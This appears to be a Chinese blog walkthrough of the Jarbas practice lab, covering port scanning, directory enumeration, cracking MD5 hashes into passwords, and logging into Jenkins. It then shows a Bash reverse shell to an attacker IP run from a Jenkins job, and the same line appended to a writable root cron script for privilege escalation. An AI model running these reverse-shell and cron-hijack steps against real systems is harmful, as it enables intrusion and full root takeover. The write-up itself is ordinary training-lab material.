靶场文件位置
C:\Users\28374\Documents\Virtual Machines\jabas
Nmap scan report for 192.168.3.57
详细信息
Nmap scan report for 192.168.3.57 Host is up (0.00060s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 28:bc:49:3c:6c:43:29:57:3c:b8:85:9a:6d:3c:16:3f (RSA) | 256 a0:1b:90:2c:da:79:eb:8f:3b:14🇩🇪bb:3f:d2:e7:3f (ECDSA) |_ 256 57:72:08:54:b7:56:ff:c3:e6:16:6f:97:cf:ae:7f:76 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 | http-methods: | Potentially risky methods: TRACE |http-title: Jarbas - O Seu Mordomo Virtual! 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Jetty 9.4.z-SNAPSHOT | http-robots.txt: 1 disallowed entry |/ |http-server-header: Jetty(9.4.z-SNAPSHOT) |http-title: Site doesn't have a title (text/html;charset=utf-8). MAC Address: 00:0C:29:C2:AC:2C (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.00 seconds
脚本扫描
Pre-scan script results: | broadcast-avahi-dos: | Discovered hosts: | 224.0.0.251 | After NULL UDP avahi packet DoS (CVE-2011-1002). |_ Hosts are all up (not vulnerable).
攻击思路规划
22(ssh) 80(http) 3306(mysql) 8080(http-proxy)
22放后面,80是web主要看,3306和80一起看,8080同和80一样
命令整理(命令见思路)
nmap -sn 192,168.25.0/24
export ip=192.168.25.128
nmap --min-rate 10000 -p- 192.168.25.128
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 8080/tcp open http-proxy
nmap -sT -sV -O -p22,80,3306,8080 192.168.25.128
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Jetty 9.4.z-SNAPSHOT MAC Address: 00:0C:29:C2:AC:2C (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop
nmap --script=vuln -p22,80,3306,8080 192.168.25.128
PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-trace: TRACE is enabled | http-sql-injection: | Possible sqli for queries: | http://192.168.25.128:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=N%3BO%3DD%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=D%3BO%3DD%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=M%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=M%3BO%3DD%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=D%3BO%3DA%27%20OR%20sqlspider | http://192.168.25.128:80/index_arquivos/?C=N%3BO%3DA%27%20OR%20sqlspider |_ http://192.168.25.128:80/index_arquivos/?C=S%3BO%3DA%27%20OR%20sqlspider | http-enum: |_ /icons/: Potentially interesting folder w/ directory listing |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.25.128 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.25.128:80/ | Form id: wmtb | Form action: /web/submit | | Path: http://192.168.25.128:80/ | Form id: | Form action: /web/20020720170457/http://jarbas.com.br:80/user.php | | Path: http://192.168.25.128:80/ | Form id: |_ Form action: /web/20020720170457/http://jarbas.com.br:80/busca/ 3306/tcp open mysql 8080/tcp open http-proxy | http-enum: |_ /robots.txt: Robots file MAC Address: 00:0C:29:C2:AC:2C (VMware)
gobuster dir -u http://192.168.25.128 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
gobuster dir -u http://192.168.25.128 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x html,php (观察技术栈指定扩展名)
/index.html (Status: 200) [Size: 32808] /.html (Status: 403) [Size: 207] /access.html (Status: 200) [Size: 359] /.html (Status: 403) [Size: 207]
tiago:5978a63b4654c73c60fa24f836386d87 trindade:f463f63616cb3f1e81ce46b39f882fd5 eder:9b38e2b1e8b12f426b0d208a7ab6cb98
一看就是cmd5,如果不知道可以使用工具判断一下
hash-identifier 5978a63b4654c73c60fa24f836386d87
Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
拿去解密一下
md5破解网站:
pmd5.com
ttmd5.com
xmd5.com
https://hashes.com/zh/decrypt/hash
tiago:italia99
trindade:marianna
eder:vipsu
登录尝试(密码信息、弱口令、默认密码、万能密码)
使用eder:vipsu登录成功
Jenkins一个用的比较多的开源CMS
Jenkins利用
新建项目
/bin/bash -i >& /dev/tcp/192.168.25.132/4444 0>&1
在Kali监听
nc -nvlp 4444
执行
成功上线
whoami
uname -a
sudo -l
lsb_release
cat /etc/passwd
ls /home
只有一个eder用户
回到~目录
ls -lish
发现有个users目录,目录下的eder还可以进入,读取xml文件发现密码哈希
#jbcrypt:$2a$10$fhvQ8iBCXnSMTvKB1.x9qO9O491DMrtO5cMChf.brW8q2pSpmi9SS
JBCrypt 哈希 形式
john --format=bcrypt hash.txt
存进文件中并且进行哈希破解
破解时间极其漫长
我们回到反弹的shell中尝试其他提权
计划任务
cat /etc/cron.d
cat /etc/crontab
发现存在root权限的脚本文件
/etc/script/CleaningScript.sh 可任意改写
这里是非交互式的shell 所以不能用vim和nano
在这里使用流编辑器sed或者echo >> 内容追加
echo '/bin/bash -i >& /dev/tcp/192.168.25.132/4444 0>&1' >> /etc/script/CleaningScript.sh
之后就是等待计划任务执行了
因为计划任务列表中就是每5分钟执行
这里等上一会儿就直接连上了
上面的john密码破解不出
破解不出,算了
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/jarbas%e9%9d%b6%e6%9c%ba%e7%bb%83%e4%b9%a0/
共有 0 条评论